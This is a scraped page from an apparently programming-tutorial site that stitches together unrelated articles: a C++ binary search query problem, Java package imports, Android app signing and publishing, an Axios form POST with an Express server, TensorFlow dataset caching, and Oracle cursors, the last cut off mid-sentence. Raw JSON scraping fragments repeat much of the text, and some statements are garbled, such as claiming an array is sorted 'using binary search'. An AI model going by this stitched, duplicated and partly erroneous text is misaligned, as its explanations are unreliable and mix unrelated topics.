O(NlogN), where N is the size of our array. In this approach, we will be using binary search to find the upper bound and lower bound of the given value. Now for binary search, we first sort our array as it works only with sorted arrays. We make our lower bound and upper bound function that helps us find the first number that satisfies the type 0, type 1 conditions, respectively, now as we have sorted the array. We found the first number that helps the condition, so the elements after this element also follow the condition, so we print the difference of the index of this element with N(the size of our array). In this article, we solve a problem to solve Queries for greater than and not less than using Binary search. We also learned the C++ program for this problem and the complete approach ( Normal and efficient ) by which we solved this problem. We can write the same program in other languages such as C, java, python, and other languages. We hope you find this article helpful.
[ { "code": null, "e": 1180, "s": 1062, "text": "In this article, we are given a problem, we are given an array, and there are two types of queries we need to answer." }, { "code": null, "e": 1274, "s": 1180, "text": "Type 0 − we have to calculate the number of greater elements than or equal to x(given value)." }, { "code": null, "e": 1365, "s": 1274, "text": "Type 1 − we have to calculate the number of strictly greater elements than x(given value)." }, { "code": null, "e": 1395, "s": 1365, "text": "So here is a simple example −" }, { "code": null, "e": 1704, "s": 1395, "text": "Input : arr[] = { 10, 15, 30 , 40, 45 } and Q = 3\n Query 1: 0 50\n Query 2: 1 40\n Query 3: 0 30\nOutput :\n 0\n 1\n 3\nExplanation:\nx = 50, q = 0 : No elements greater than or equal to 50.\nx = 40, q = 1 : 45 is greater than 40.\nx = 30, q = 0 : three elements 30, 40, 45 are greater than or equal to 30." }, { "code": null, "e": 1915, "s": 1704, "text": "We can use two different methods to find the solution. Firstly we will use the brute force solution and then check if it can work for higher constraints or not. If not, then we proceed to optimize our solution." }, { "code": null, "e": 2042, "s": 1915, "text": "In this approach, we will traverse through the array for all q queries and find the numbers that satisfy the given conditions." }, { "code": null, "e": 2701, "s": 2042, "text": "#include <bits/stdc++.h>\nusing namespace std;\nvoid query(int *arr, int n, int type, int val) {\n int count = 0; // answer\n if(!type) { // when type 0 query is asked\n for(int i = 0; i < n; i++) {\n if(arr[i] >= val)\n count++;\n }\n } else { // when type 1 query is asked\n for(int i = 0; i < n; i++) {\n if(arr[i] > val)\n count++;\n }\n }\n cout << count << \"\\n\";\n}\nint main() {\n int ARR[] = { 10, 15, 30, 40, 45 };\n int n = sizeof(ARR)/sizeof(ARR[0]); // size of our array\n query(ARR, n, 0, 50); // query 1\n query(ARR, n, 1, 40); // query 2\n query(ARR, n, 0, 30); // query 3\n return 0;\n}" }, { "code": null, "e": 2707, "s": 2701, "text": "0\n1\n3" }, { "code": null, "e": 3138, "s": 2707, "text": "In the above approach, we are simply traversing through the array and calculating the answer for the queries; this approach is working for the given examples, but if we encounter higher constraint, this approach will fail as the overall time complexity of the program is O(N*Q) where N is the size of our array and Q is the number of queries so now we will optimize this approach such that it works for higher constraints as well." }, { "code": null, "e": 3361, "s": 3138, "text": "In this approach, we will be using binary search to find the upper bound and lower bound of the given value. We first sort our array using binary search and then apply our lower bound and upper bound functions accordingly." }, { "code": null, "e": 4646, "s": 3361, "text": "#include <bits/stdc++.h>\n\nusing namespace std;\nvoid lowerbound(int *arr, int n, int val) {\n int l = -1, r = n;\n while(r - l > 1) { // binary searching the answer\n int mid = (l+r)/2;\n if(arr[mid] >= val)\n r = mid;\n else\n l = mid;\n }\n if(r == n) // if r is unmoved then it means there is no element that satisfy the condition\n cout << \"0\\n\";\n else\n cout << n - r << \"\\n\";\n}\nvoid upperbound(int *arr, int n, int val) {\n int l = -1, r = n;\n while(r - l > 1) { // binary searching the answer\n int mid = (l+r)/2;\n if(arr[mid] > val)\n r = mid;\n else\n l = mid;\n }\n if(r == n)// if r is unmoved then it means there is no element that satisfy the condition\n cout << \"0\\n\";\n else\n cout << n - r <<\"\\n\";\n}\nvoid query(int *arr, int n, int type, int val) {\n if(!type) // if type == 0 we call lower bound function\n lowerbound(arr, n, val);\n else // if type == 1 we call upperbound function\n upperbound(arr, n, val);\n}\nint main() {\n int arr[] = { 1, 2, 3, 4 };\n int n = sizeof(arr)/sizeof(arr[0]); // size of our array\n sort(arr, arr+n); // sorting the array\n query(arr, n, 0, 5); // query 1\n query(arr, n, 1, 3); // query 2\n query(arr, n, 0, 3); // query 3\n return 0;\n}" }, { "code": null, "e": 4652, "s": 4646, "text": "0\n1\n2" }, { "code": null, "e": 4820, "s": 4652, "text": "The above code works on a binary search that decreases our time complexity substantially. Thus our final complexity becomes O(NlogN), where N is the size of our array." }, { "code": null, "e": 5392, "s": 4820, "text": "In this approach, we will be using binary search to find the upper bound and lower bound of the given value. Now for binary search, we first sort our array as it works only with sorted arrays. We make our lower bound and upper bound function that helps us find the first number that satisfies the type 0, type 1 conditions, respectively, now as we have sorted the array. We found the first number that helps the condition, so the elements after this element also follow the condition, so we print the difference of the index of this element with N(the size of our array)." }, { "code": null, "e": 5768, "s": 5392, "text": "In this article, we solve a problem to solve Queries for greater than and not less than using Binary search. We also learned the C++ program for this problem and the complete approach ( Normal and efficient ) by which we solved this problem. We can write the same program in other languages such as C, java, python, and other languages. We hope you find this article helpful." } ]
How to use classes in other package in Java
You can understand it using an example where a Boss class is defined in payroll package. package payroll; public class Boss { public void payEmployee(Employee e) { e.mailCheck(); } } if the Employee class is not in the payroll package? The Boss class must then use one of the following techniques for referring to a class in a different package. The fully qualified name of the class can be used. For example − payroll.Employee The package can be imported using the import keyword and the wildcard (*). For example − import payroll.*; The class itself can be imported using the import keyword. For example − import payroll.Employee;
[ { "code": null, "e": 1151, "s": 1062, "text": "You can understand it using an example where a Boss class is defined in payroll package." }, { "code": null, "e": 1257, "s": 1151, "text": "package payroll;\npublic class Boss {\n public void payEmployee(Employee e) {\n e.mailCheck();\n }\n}" }, { "code": null, "e": 1420, "s": 1257, "text": "if the Employee class is not in the payroll package? The Boss class must then use one of the following techniques for referring to a class in a different package." }, { "code": null, "e": 1485, "s": 1420, "text": "The fully qualified name of the class can be used. For example −" }, { "code": null, "e": 1502, "s": 1485, "text": "payroll.Employee" }, { "code": null, "e": 1591, "s": 1502, "text": "The package can be imported using the import keyword and the wildcard (*). For example −" }, { "code": null, "e": 1609, "s": 1591, "text": "import payroll.*;" }, { "code": null, "e": 1682, "s": 1609, "text": "The class itself can be imported using the import keyword. For example −" }, { "code": null, "e": 1707, "s": 1682, "text": "import payroll.Employee;" } ]
Publishing Android Application
Android application publishing is a process that makes your Android applications available to users. Infect, publishing is the last phase of the Android application development process. Once you developed and fully tested your Android Application, you can start selling or distributing free using Google Play (A famous Android marketplace). You can also release your applications by sending them directly to users or by letting users download them from your own website. You can check a detailed publishing process at Android official website, but this tutorial will take you through simple steps to launch your application on Google Play. Here is a simplified check list which will help you in launching your Android application − Before exporting the apps, you must some of tools Dx tools(Dalvik executable tools ): It going to convert .class file to .dex file. it has useful for memory optimization and reduce the boot-up speed time Dx tools(Dalvik executable tools ): It going to convert .class file to .dex file. it has useful for memory optimization and reduce the boot-up speed time AAPT(Android assistance packaging tool):it has useful to convert .Dex file to.Apk AAPT(Android assistance packaging tool):it has useful to convert .Dex file to.Apk APK(Android packaging kit): The final stage of deployment process is called as .apk. APK(Android packaging kit): The final stage of deployment process is called as .apk. You will need to export your application as an APK (Android Package) file before you upload it Google Play marketplace. To export an application, just open that application project in Android studio and select Build → Generate Signed APK from your Android studio and follow the simple steps to export your application − Next select, Generate Signed APK option as shown in the above screen shot and then click it so that you get following screen where you will choose Create new keystore to store your application. Enter your key store path,key store password,key alias and key password to protect your application and click on Next button once again. It will display following screen to let you create an application − Once you filled up all the information,like app destination,build type and flavours click finish button While creating an application it will show as below Finally, it will generate your Android Application as APK formate File which will be uploaded at Google Play marketplace. The most important step is to register with Google Play using Google Play Marketplace. You can use your existing google ID if you have any otherwise you can create a new Google ID and then register with the marketplace. You will have following screen to accept terms and condition. You can use Continue to payment button to proceed to make a payment of $25 as a registration fee and finally to complete your account detail. Once you are a registered user at Google Play, you can upload release-ready APK for your application and finally you will complete application detail using application detail page as mentioned in step 9 of the above mentioned checklist. You do not need Android Studio to sign your app. You can sign your app from the command line using standard tools from the Android SDK and the JDK. To sign an app in release mode from the command line − Generate a private key using keytool $ keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000 Compile your app in release mode to obtain an unsigned APK Compile your app in release mode to obtain an unsigned APK Sign your app with your private key using jarsigner Sign your app with your private key using jarsigner $ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore my_application.apk alias_name Verify that your APK is signed. For example − $ jarsigner -verify -verbose -certs my_application.apk Align the final APK package using zipalign. Align the final APK package using zipalign. $ zipalign -v 4 your_project_name-unaligned.apk your_project_name.apk Google play phoload APTOiDE Amazon AppStore 1mobile Insyde Market Yandex store F-Droid Samsung Galaxy AppStore 46 Lectures 7.5 hours Aditya Dua 32 Lectures 3.5 hours Sharad Kumar 9 Lectures 1 hours Abhilash Nelson 14 Lectures 1.5 hours Abhilash Nelson 15 Lectures 1.5 hours Abhilash Nelson 10 Lectures 1 hours Abhilash Nelson Print Add Notes Bookmark this page
[ { "code": null, "e": 3793, "s": 3607, "text": "Android application publishing is a process that makes your Android applications available to users. Infect, publishing is the last phase of the Android application development process." }, { "code": null, "e": 4078, "s": 3793, "text": "Once you developed and fully tested your Android Application, you can start selling or distributing free using Google Play (A famous Android marketplace). You can also release your applications by sending them directly to users or by letting users download them from your own website." }, { "code": null, "e": 4340, "s": 4078, "text": "You can check a detailed publishing process at Android official website, but this tutorial will take you through simple steps to launch your application on Google Play. Here is a simplified check list which will help you in launching your Android application −" }, { "code": null, "e": 4390, "s": 4340, "text": "Before exporting the apps, you must some of tools" }, { "code": null, "e": 4544, "s": 4390, "text": "Dx tools(Dalvik executable tools ): It going to convert .class file to .dex file. it has useful for memory optimization and reduce the boot-up speed time" }, { "code": null, "e": 4698, "s": 4544, "text": "Dx tools(Dalvik executable tools ): It going to convert .class file to .dex file. it has useful for memory optimization and reduce the boot-up speed time" }, { "code": null, "e": 4780, "s": 4698, "text": "AAPT(Android assistance packaging tool):it has useful to convert .Dex file to.Apk" }, { "code": null, "e": 4862, "s": 4780, "text": "AAPT(Android assistance packaging tool):it has useful to convert .Dex file to.Apk" }, { "code": null, "e": 4947, "s": 4862, "text": "APK(Android packaging kit): The final stage of deployment process is called as .apk." }, { "code": null, "e": 5032, "s": 4947, "text": "APK(Android packaging kit): The final stage of deployment process is called as .apk." }, { "code": null, "e": 5152, "s": 5032, "text": "You will need to export your application as an APK (Android Package) file before you upload it Google Play marketplace." }, { "code": null, "e": 5352, "s": 5152, "text": "To export an application, just open that application project in Android studio and select Build → Generate Signed APK from your Android studio and follow the simple steps to export your application −" }, { "code": null, "e": 5546, "s": 5352, "text": "Next select, Generate Signed APK option as shown in the above screen shot and then click it so that you get following screen where you will choose Create new keystore to store your application." }, { "code": null, "e": 5751, "s": 5546, "text": "Enter your key store path,key store password,key alias and key password to protect your application and click on Next button once again. It will display following screen to let you create an application −" }, { "code": null, "e": 5907, "s": 5751, "text": "Once you filled up all the information,like app destination,build type and flavours click finish button While creating an application it will show as below" }, { "code": null, "e": 6029, "s": 5907, "text": "Finally, it will generate your Android Application as APK formate File which will be uploaded at Google Play marketplace." }, { "code": null, "e": 6312, "s": 6029, "text": "The most important step is to register with Google Play using Google Play Marketplace. You can use your existing google ID if you have any otherwise you can create a new Google ID and then register with the marketplace. You will have following screen to accept terms and condition." }, { "code": null, "e": 6454, "s": 6312, "text": "You can use Continue to payment button to proceed to make a payment of $25 as a registration fee and finally to complete your account detail." }, { "code": null, "e": 6691, "s": 6454, "text": "Once you are a registered user at Google Play, you can upload release-ready APK for your application and finally you will complete application detail using application detail page as mentioned in step 9 of the above mentioned checklist." }, { "code": null, "e": 6894, "s": 6691, "text": "You do not need Android Studio to sign your app. You can sign your app from the command line using standard tools from the Android SDK and the JDK. To sign an app in release mode from the command line −" }, { "code": null, "e": 6931, "s": 6894, "text": "Generate a private key using keytool" }, { "code": null, "e": 7046, "s": 6931, "text": "$ keytool -genkey -v -keystore my-release-key.keystore\n-alias alias_name -keyalg RSA -keysize 2048 -validity 10000" }, { "code": null, "e": 7105, "s": 7046, "text": "Compile your app in release mode to obtain an unsigned APK" }, { "code": null, "e": 7164, "s": 7105, "text": "Compile your app in release mode to obtain an unsigned APK" }, { "code": null, "e": 7216, "s": 7164, "text": "Sign your app with your private key using jarsigner" }, { "code": null, "e": 7268, "s": 7216, "text": "Sign your app with your private key using jarsigner" }, { "code": null, "e": 7389, "s": 7268, "text": "$ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1\n-keystore my-release-key.keystore my_application.apk alias_name" }, { "code": null, "e": 7435, "s": 7389, "text": "Verify that your APK is signed. For example −" }, { "code": null, "e": 7490, "s": 7435, "text": "$ jarsigner -verify -verbose -certs my_application.apk" }, { "code": null, "e": 7534, "s": 7490, "text": "Align the final APK package using zipalign." }, { "code": null, "e": 7578, "s": 7534, "text": "Align the final APK package using zipalign." }, { "code": null, "e": 7648, "s": 7578, "text": "$ zipalign -v 4 your_project_name-unaligned.apk your_project_name.apk" }, { "code": null, "e": 7661, "s": 7648, "text": "\nGoogle play" }, { "code": null, "e": 7669, "s": 7661, "text": "phoload" }, { "code": null, "e": 7678, "s": 7669, "text": "\nAPTOiDE" }, { "code": null, "e": 7695, "s": 7678, "text": "\nAmazon AppStore" }, { "code": null, "e": 7703, "s": 7695, "text": "1mobile" }, { "code": null, "e": 7718, "s": 7703, "text": "\nInsyde Market" }, { "code": null, "e": 7732, "s": 7718, "text": "\nYandex store" }, { "code": null, "e": 7740, "s": 7732, "text": "F-Droid" }, { "code": null, "e": 7765, "s": 7740, "text": "\nSamsung Galaxy AppStore" }, { "code": null, "e": 7800, "s": 7765, "text": "\n 46 Lectures \n 7.5 hours \n" }, { "code": null, "e": 7812, "s": 7800, "text": " Aditya Dua" }, { "code": null, "e": 7847, "s": 7812, "text": "\n 32 Lectures \n 3.5 hours \n" }, { "code": null, "e": 7861, "s": 7847, "text": " Sharad Kumar" }, { "code": null, "e": 7893, "s": 7861, "text": "\n 9 Lectures \n 1 hours \n" }, { "code": null, "e": 7910, "s": 7893, "text": " Abhilash Nelson" }, { "code": null, "e": 7945, "s": 7910, "text": "\n 14 Lectures \n 1.5 hours \n" }, { "code": null, "e": 7962, "s": 7945, "text": " Abhilash Nelson" }, { "code": null, "e": 7997, "s": 7962, "text": "\n 15 Lectures \n 1.5 hours \n" }, { "code": null, "e": 8014, "s": 7997, "text": " Abhilash Nelson" }, { "code": null, "e": 8047, "s": 8014, "text": "\n 10 Lectures \n 1 hours \n" }, { "code": null, "e": 8064, "s": 8047, "text": " Abhilash Nelson" }, { "code": null, "e": 8071, "s": 8064, "text": " Print" }, { "code": null, "e": 8082, "s": 8071, "text": " Add Notes" } ]
How to post a file from a form with Axios? - GeeksforGeeks
10 Sep, 2020 In this article, we are going to discuss making POST requests with form data using the Axios library. Axios is a Promise based HTTP client that can be used for the web as well as for Node.JS development. However, in this article, we are going to strictly refer to client-side use of Axios. To start off, we need to add axios to our development by using a CDN link : <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"> </script> In order to use extract data from our form, we are going to use the FormData() method. The formdata method converts the data input in the form in the form of key-value pairs to create a multipart/form-data object. HTML: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.19.2/axios.min.js" crossorigin="anonymous"> </script> <title>Document</title></head> <body> <h3 style="color:green; font-size:25px;"> Geeks For Geeks </h3> <form> <input name="first-name"/><br> <input name="last-name"/><br> <input name="address"/><br> <button type="submit">Submit</button> </form></body></html> Output: Axios Post Request SyntaxThere are two ways to make an axios post request : Standard post request:axios.post(url, data).then(callbackFn()).catch(callbackFn(err))url : The request url for HTTP POST.data : An object containing the POST datacallbackFn() : Callback functions to handle the promise.Post Request with a configuration objectaxios({method : ‘post’,url : url,data : dataheaders : headers}).then(callbackFn()).catch(callbackFn())method : specifies the HTTP methoddata : an object containing the POST data.headers(optional) : An object to specify the headers associated with the request. Standard post request:axios.post(url, data).then(callbackFn()).catch(callbackFn(err))url : The request url for HTTP POST.data : An object containing the POST datacallbackFn() : Callback functions to handle the promise.Post Request with a configuration object axios.post(url, data).then(callbackFn()).catch(callbackFn(err))url : The request url for HTTP POST.data : An object containing the POST datacallbackFn() : Callback functions to handle the promise. Post Request with a configuration object axios({method : ‘post’,url : url,data : dataheaders : headers}).then(callbackFn()).catch(callbackFn())method : specifies the HTTP methoddata : an object containing the POST data.headers(optional) : An object to specify the headers associated with the request. method : specifies the HTTP methoddata : an object containing the POST data.headers(optional) : An object to specify the headers associated with the request. Javascript Code to send form data to servers : window.addEventListener('load', ()=>{ const form = document.querySelector('form'); form.addEventListener('submit', (e)=>{ //to prevent reload e.preventDefault(); //creates a multipart/form-data object let data = new FormData(form); axios({ method : 'post', url : '/', data : data, }) .then((res)=>{ console.log(res); }) .catch((err) => {throw err}); }); }); Testing the Axios request with a mock rest API:Front End Code: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.19.2/axios.min.js" integrity="sha512-VZ6m0F78+yo3sbu48gElK4irv2dzPoep8oo9LEjxviigcnnnNvnTOJRSrIhuFk68FMLOpiNz+T77nNY89rnWDg==" crossorigin="anonymous"></script> <title>Document</title> </head> <body> <h3 style="color: green; font-size: 25px;"> Geeks For Geeks </h3> <form> <input name="first-name" /><br /> <input name="last-name" /><br /> <input name="address" /><br /> <button type="submit">Submit</button> </form> <script type="text/javascript"> window.addEventListener("load", () => { const form = document.querySelector("form"); form.addEventListener("submit", (e) => { e.preventDefault(); let data = new FormData(form); console.log(data); axios({ method: "post", url: "/", data: data, }) .then((res) => { console.log(res); }) .catch((err) => { throw err; }); }); }); </script> </body></html> Code for the Node.js based mock REST API: const express = require('express');const formidable = require('express-formidable'); const app = express(); app.use(express.static(__dirname+'/index.html'));app.use(formidable()); app.get('/', (req, res)=>{ res.sendFile(__dirname+'/index.html');}); app.post('/', (req, res)=>{ console.log(JSON.stringify(req.fields));}); app.listen('3000', ()=>{ console.log('listening to port'); }); Sample Request Data: Output in console: {"first-name":"Geeks", "last-name":"Geeks", "address":"Noida"} JavaScript-Misc Picked JavaScript Web Technologies Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Difference between var, let and const keywords in JavaScript How to create a link in JavaScript ? How to Show Images on Click using HTML ? Remove elements from a JavaScript Array How to remove an HTML element using JavaScript ? Express.js express.Router() Function Installation of Node.js on Linux Top 10 Projects For Beginners To Practice HTML and CSS Skills How to fetch data from an API in ReactJS ? Difference between var, let and const keywords in JavaScript
[ { "code": null, "e": 24909, "s": 24881, "text": "\n10 Sep, 2020" }, { "code": null, "e": 25199, "s": 24909, "text": "In this article, we are going to discuss making POST requests with form data using the Axios library. Axios is a Promise based HTTP client that can be used for the web as well as for Node.JS development. However, in this article, we are going to strictly refer to client-side use of Axios." }, { "code": null, "e": 25275, "s": 25199, "text": "To start off, we need to add axios to our development by using a CDN link :" }, { "code": null, "e": 25353, "s": 25275, "text": "<script src=\"https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js\"> </script>" }, { "code": null, "e": 25567, "s": 25353, "text": "In order to use extract data from our form, we are going to use the FormData() method. The formdata method converts the data input in the form in the form of key-value pairs to create a multipart/form-data object." }, { "code": null, "e": 25573, "s": 25567, "text": "HTML:" }, { "code": "<!DOCTYPE html><html lang=\"en\"><head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"> <script src=\"https://cdnjs.cloudflare.com/ajax/libs/axios/0.19.2/axios.min.js\" crossorigin=\"anonymous\"> </script> <title>Document</title></head> <body> <h3 style=\"color:green; font-size:25px;\"> Geeks For Geeks </h3> <form> <input name=\"first-name\"/><br> <input name=\"last-name\"/><br> <input name=\"address\"/><br> <button type=\"submit\">Submit</button> </form></body></html>", "e": 26137, "s": 25573, "text": null }, { "code": null, "e": 26145, "s": 26137, "text": "Output:" }, { "code": null, "e": 26221, "s": 26145, "text": "Axios Post Request SyntaxThere are two ways to make an axios post request :" }, { "code": null, "e": 26739, "s": 26221, "text": "Standard post request:axios.post(url, data).then(callbackFn()).catch(callbackFn(err))url : The request url for HTTP POST.data : An object containing the POST datacallbackFn() : Callback functions to handle the promise.Post Request with a configuration objectaxios({method : ‘post’,url : url,data : dataheaders : headers}).then(callbackFn()).catch(callbackFn())method : specifies the HTTP methoddata : an object containing the POST data.headers(optional) : An object to specify the headers associated with the request." }, { "code": null, "e": 26998, "s": 26739, "text": "Standard post request:axios.post(url, data).then(callbackFn()).catch(callbackFn(err))url : The request url for HTTP POST.data : An object containing the POST datacallbackFn() : Callback functions to handle the promise.Post Request with a configuration object" }, { "code": null, "e": 27195, "s": 26998, "text": "axios.post(url, data).then(callbackFn()).catch(callbackFn(err))url : The request url for HTTP POST.data : An object containing the POST datacallbackFn() : Callback functions to handle the promise." }, { "code": null, "e": 27236, "s": 27195, "text": "Post Request with a configuration object" }, { "code": null, "e": 27496, "s": 27236, "text": "axios({method : ‘post’,url : url,data : dataheaders : headers}).then(callbackFn()).catch(callbackFn())method : specifies the HTTP methoddata : an object containing the POST data.headers(optional) : An object to specify the headers associated with the request." }, { "code": null, "e": 27654, "s": 27496, "text": "method : specifies the HTTP methoddata : an object containing the POST data.headers(optional) : An object to specify the headers associated with the request." }, { "code": null, "e": 27701, "s": 27654, "text": "Javascript Code to send form data to servers :" }, { "code": "window.addEventListener('load', ()=>{ const form = document.querySelector('form'); form.addEventListener('submit', (e)=>{ //to prevent reload e.preventDefault(); //creates a multipart/form-data object let data = new FormData(form); axios({ method : 'post', url : '/', data : data, }) .then((res)=>{ console.log(res); }) .catch((err) => {throw err}); }); });", "e": 28226, "s": 27701, "text": null }, { "code": null, "e": 28289, "s": 28226, "text": "Testing the Axios request with a mock rest API:Front End Code:" }, { "code": "<!DOCTYPE html><html lang=\"en\"> <head> <meta charset=\"UTF-8\" /> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" /> <script src=\"https://cdnjs.cloudflare.com/ajax/libs/axios/0.19.2/axios.min.js\" integrity=\"sha512-VZ6m0F78+yo3sbu48gElK4irv2dzPoep8oo9LEjxviigcnnnNvnTOJRSrIhuFk68FMLOpiNz+T77nNY89rnWDg==\" crossorigin=\"anonymous\"></script> <title>Document</title> </head> <body> <h3 style=\"color: green; font-size: 25px;\"> Geeks For Geeks </h3> <form> <input name=\"first-name\" /><br /> <input name=\"last-name\" /><br /> <input name=\"address\" /><br /> <button type=\"submit\">Submit</button> </form> <script type=\"text/javascript\"> window.addEventListener(\"load\", () => { const form = document.querySelector(\"form\"); form.addEventListener(\"submit\", (e) => { e.preventDefault(); let data = new FormData(form); console.log(data); axios({ method: \"post\", url: \"/\", data: data, }) .then((res) => { console.log(res); }) .catch((err) => { throw err; }); }); }); </script> </body></html>", "e": 29868, "s": 28289, "text": null }, { "code": null, "e": 29910, "s": 29868, "text": "Code for the Node.js based mock REST API:" }, { "code": "const express = require('express');const formidable = require('express-formidable'); const app = express(); app.use(express.static(__dirname+'/index.html'));app.use(formidable()); app.get('/', (req, res)=>{ res.sendFile(__dirname+'/index.html');}); app.post('/', (req, res)=>{ console.log(JSON.stringify(req.fields));}); app.listen('3000', ()=>{ console.log('listening to port'); });", "e": 30315, "s": 29910, "text": null }, { "code": null, "e": 30336, "s": 30315, "text": "Sample Request Data:" }, { "code": null, "e": 30355, "s": 30336, "text": "Output in console:" }, { "code": null, "e": 30418, "s": 30355, "text": "{\"first-name\":\"Geeks\", \"last-name\":\"Geeks\", \"address\":\"Noida\"}" }, { "code": null, "e": 30434, "s": 30418, "text": "JavaScript-Misc" }, { "code": null, "e": 30441, "s": 30434, "text": "Picked" }, { "code": null, "e": 30452, "s": 30441, "text": "JavaScript" }, { "code": null, "e": 30469, "s": 30452, "text": "Web Technologies" }, { "code": null, "e": 30567, "s": 30469, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 30576, "s": 30567, "text": "Comments" }, { "code": null, "e": 30589, "s": 30576, "text": "Old Comments" }, { "code": null, "e": 30650, "s": 30589, "text": "Difference between var, let and const keywords in JavaScript" }, { "code": null, "e": 30687, "s": 30650, "text": "How to create a link in JavaScript ?" }, { "code": null, "e": 30728, "s": 30687, "text": "How to Show Images on Click using HTML ?" }, { "code": null, "e": 30768, "s": 30728, "text": "Remove elements from a JavaScript Array" }, { "code": null, "e": 30817, "s": 30768, "text": "How to remove an HTML element using JavaScript ?" }, { "code": null, "e": 30854, "s": 30817, "text": "Express.js express.Router() Function" }, { "code": null, "e": 30887, "s": 30854, "text": "Installation of Node.js on Linux" }, { "code": null, "e": 30949, "s": 30887, "text": "Top 10 Projects For Beginners To Practice HTML and CSS Skills" }, { "code": null, "e": 30992, "s": 30949, "text": "How to fetch data from an API in ReactJS ?" } ]
How can Tensorflow be used to configure the dataset for performance?
The flower dataset can be configured for performance with the help of buffer prefetch, shuffle method, and cache method. Buffered prefetching can be used to ensure that the data can be taken from disk without having I/O become blocking. Dataset.cache() keeps the images in memory after they have been loaded off disk during the first epoch. Dataset.prefetch() will overlap the data preprocessing and model execution while training. Read More: What is TensorFlow and how Keras work with TensorFlow to create Neural Networks? The Keras Sequential API is used, which is helpful in building a sequential model that is used to work with a plain stack of layers, where every layer has exactly one input tensor and one output tensor. We are using the Google Colaboratory to run the below code. Google Colab or Colaboratory helps run Python code over the browser and requires zero configuration and free access to GPUs (Graphical Processing Units). Colaboratory has been built on top of Jupyter Notebook. print("Configuring the dataset for better performance") AUTOTUNE = tf.data.AUTOTUNE train_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE) val_ds = val_ds.cache().prefetch(buffer_size=AUTOTUNE) Code credit: https://www.tensorflow.org/tutorials/images/classification Configuring the dataset for better performance Configuring the dataset for better performance The concept of buffered prefetching can be used so that the data can be taken from disk without having I/O become blocking. There are two important methods that can be used when loading data.cache() keeps the images in memory after they have been loaded off disk during the first epoch.This will ensure that the dataset doesn't become a bottleneck when the model is being trained.If the dataset is too large to fit into memory, this method can be used to create a performant on-disk cache.prefetch() will overlap the data preprocessing and model execution while training. cache() keeps the images in memory after they have been loaded off disk during the first epoch. This will ensure that the dataset doesn't become a bottleneck when the model is being trained. If the dataset is too large to fit into memory, this method can be used to create a performant on-disk cache. prefetch() will overlap the data preprocessing and model execution while training.
[ { "code": null, "e": 1494, "s": 1062, "text": "The flower dataset can be configured for performance with the help of buffer prefetch, shuffle method, and cache method. Buffered prefetching can be used to ensure that the data can be taken from disk without having I/O become blocking. Dataset.cache() keeps the images in memory after they have been loaded off disk during the first epoch. Dataset.prefetch() will overlap the data preprocessing and model execution while training." }, { "code": null, "e": 1586, "s": 1494, "text": "Read More:\nWhat is TensorFlow and how Keras work with TensorFlow to create Neural Networks?" }, { "code": null, "e": 1789, "s": 1586, "text": "The Keras Sequential API is used, which is helpful in building a sequential model that is used to work with a plain stack of layers, where every layer has exactly one input tensor and one output tensor." }, { "code": null, "e": 2059, "s": 1789, "text": "We are using the Google Colaboratory to run the below code. Google Colab or Colaboratory helps run Python code over the browser and requires zero configuration and free access to GPUs (Graphical Processing Units). Colaboratory has been built on top of Jupyter Notebook." }, { "code": null, "e": 2271, "s": 2059, "text": "print(\"Configuring the dataset for better performance\")\nAUTOTUNE = tf.data.AUTOTUNE\ntrain_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)\nval_ds = val_ds.cache().prefetch(buffer_size=AUTOTUNE)" }, { "code": null, "e": 2343, "s": 2271, "text": "Code credit: https://www.tensorflow.org/tutorials/images/classification" }, { "code": null, "e": 2390, "s": 2343, "text": "Configuring the dataset for better performance" }, { "code": null, "e": 2437, "s": 2390, "text": "Configuring the dataset for better performance" }, { "code": null, "e": 2561, "s": 2437, "text": "The concept of buffered prefetching can be used so that the data can be taken from disk without having I/O become blocking." }, { "code": null, "e": 3009, "s": 2561, "text": "There are two important methods that can be used when loading data.cache() keeps the images in memory after they have been loaded off disk during the first epoch.This will ensure that the dataset doesn't become a bottleneck when the model is being trained.If the dataset is too large to fit into memory, this method can be used to create a performant on-disk cache.prefetch() will overlap the data preprocessing and model execution while training." }, { "code": null, "e": 3105, "s": 3009, "text": "cache() keeps the images in memory after they have been loaded off disk during the first epoch." }, { "code": null, "e": 3200, "s": 3105, "text": "This will ensure that the dataset doesn't become a bottleneck when the model is being trained." }, { "code": null, "e": 3310, "s": 3200, "text": "If the dataset is too large to fit into memory, this method can be used to create a performant on-disk cache." }, { "code": null, "e": 3393, "s": 3310, "text": "prefetch() will overlap the data preprocessing and model execution while training." } ]
Cursors in Oracle DBMS
When a SQL statement is executed in Oracle, the temporary context area is created. This area contains all the relevant information relating to the statement and its execution. The cursor is a pointer to this context area and allows the PL/SQL program to control this area. There are two types of Cursors. Implicit Cursors Explicit Cursors Let us begin with Implicit Cursors − Whenever an SQL statement is executed, the implicit cursors are automatically created. This happens if there is no explicit cursor for the particular statement. Implicit cursors cannot be controlled by the programmers. There are many different attributes for Implicit Cursors. Some of them are − If one or more records were fetched successfully with commands such as INSERT, UPDATE, DELETE etc., then it returns TRUE. Otherwise it returns FALSE. This is the direct opposite of %FOUND. If one or more records were fetched successfully with commands such as INSERT, UPDATE, DELETE etc., then it returns FALSE. Otherwise it returns TRUE. This returns the number of rows that are affected by different commands such as INSERT, UPDATE, DELETE etc. This returns TRUE if the cursor is open and false otherwise. However, for implicit cursors, the value is always FALSE because the cursor is closed immediately after executing its instruction. While implicit cursors were automatically created, explicit cursors are specifically created by the programmers. There definition is provided in the 